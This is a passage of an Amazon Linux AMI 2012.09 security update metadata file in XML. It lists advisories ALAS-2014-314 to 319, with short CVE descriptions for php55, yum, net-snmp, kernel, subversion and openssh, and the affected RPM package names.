arch="i686"><filename>Packages/php54-odbc-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.26-1.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-314</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-314: important priority package update for php55</title><issued date="2014-03-24 23:37:00" /><updated date="2014-09-18 00:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2270:
1072220:
CVE-2014-2270 file: out-of-bounds memory access when parsing Portable Executable (PE) format files
CVE-2014-1943:
Fine Free file before 5.17 allows context-dependent attackers to cause a denial of service (infinite recursion, CPU consumption, and crash) via a crafted indirect offset value in the magic of a file.
1065836:
CVE-2014-1943 file: unrestricted recursion in handling of indirect type rules
1065836:
CVE-2014-1943 file: infinite recursion
CVE-2013-7327:
The gdImageCrop function in ext/gd/gd.c in PHP 5.5.x before 5.5.9 does not check return values, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via invalid imagecrop arguments that lead to use of a NULL pointer as a return value, a different vulnerability than CVE-2013-7226.
1065108:
CVE-2013-7226 CVE-2013-7327 CVE-2013-7328 CVE-2014-2020 php: multiple vulnerabilities in gdImageCrop()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7327" title="" id="CVE-2013-7327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943" title="" id="CVE-2014-1943" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270" title="" id="CVE-2014-2270" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-soap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.10-1.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-315</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-315: medium priority package update for yum</title><issued date="2014-03-24 23:38:00" /><updated date="2014-09-18 00:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0022:
The installUpdates function in yum-cron/yum-cron.py in yum 3.4.3 and earlier does not properly check the return value of the sigCheckPkg function, which allows remote attackers to bypass the RMP package signing restriction via an unsigned package.
1057377:
CVE-2014-0022 yum: yum-cron installs unsigned packages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0022" title="" id="CVE-2014-0022" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="yum-cron-security" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-cron-security-3.4.3-137.49.amzn1.noarch.rpm</filename></package><package name="yum-cron-hourly" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-cron-hourly-3.4.3-137.49.amzn1.noarch.rpm</filename></package><package name="yum" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-3.4.3-137.49.amzn1.noarch.rpm</filename></package><package name="yum-cron" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-cron-3.4.3-137.49.amzn1.noarch.rpm</filename></package><package name="yum-cron-daily" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-cron-daily-3.4.3-137.49.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-316</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-316: medium priority package update for net-snmp</title><issued date="2014-03-24 23:39:00" /><updated date="2014-09-18 00:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2284:
A buffer overflow flaw was found in the way the decode_icmp_msg() function in the ICMP-MIB implementation processed Internet Control Message Protocol (ICMP) message statistics reported in the /proc/net/snmp file. A remote attacker could send a message for each ICMP message type, which could potentially cause the snmpd service to crash when processing the /proc/net/snmp file.
CVE-2012-6151:
Net-SNMP 5.7.1 and earlier, when AgentX is registering to handle a MIB and processing GETNEXT requests, allows remote attackers to cause a denial of service (crash or infinite loop, CPU consumption, and hang) by causing the AgentX subagent to timeout.
1038007:
CVE-2012-6151 net-snmp: snmpd crashes/hangs when AgentX subagent times-out
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6151" title="" id="CVE-2012-6151" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2284" title="" id="CVE-2014-2284" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0321.html" title="" id="RHSA-2014:0321" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="net-snmp-debuginfo" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-debuginfo-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-python" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-python-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-perl-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-utils-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-devel-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-libs-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-libs-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-utils-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-perl-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-devel-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-debuginfo-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-python-5.5-49.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-317</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-317: low priority package update for kernel</title><issued date="2014-03-24 23:39:00" /><updated date="2014-09-18 00:06:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0101:
The sctp_sf_do_5_1D_ce function in net/sctp/sm_statefuns.c in the Linux kernel through 3.13.6 does not validate certain auth_enable and auth_capable fields before making an sctp_sf_authenticate call, which allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) via an SCTP handshake with a modified INIT chunk and a crafted AUTH chunk before a COOKIE_ECHO chunk.
1070705:
CVE-2014-0101 kernel: net: sctp: null pointer dereference when processing authenticated cookie_echo chunk
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0101" title="" id="CVE-2014-0101" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.34" release="37.137.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.34-37.137.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-318</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-318: medium priority package update for subversion</title><issued date="2014-03-25 12:14:00" /><updated date="2014-09-18 00:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0032:
The get_resource function in repos.c in the mod_dav_svn module in Apache Subversion before 1.7.15 and 1.8.x before 1.8.6, when SVNListParentPath is enabled, allows remote attackers to cause a denial of service (crash) via vectors related to the server root and request methods other than GET, as demonstrated by the "svn ls http://svn.example.com" command.
A flaw was found in the way the mod_dav_svn module handled OPTIONS requests. A remote attacker with read access to an SVN repository served via HTTP could use this flaw to cause the httpd process that handled such a request to crash.
1062042:
CVE-2014-0032 subversion: mod_dav_svn crash when handling certain requests with SVNListParentPath on
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0032" title="" id="CVE-2014-0032" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-ruby" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-python" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.8-1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-319</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-319: important priority package update for openssh</title><issued date="2014-03-28 18:25:00" /><updated date="2014-09-18 00:48:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-ldap" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="7.39.amzn1" epoch="0" 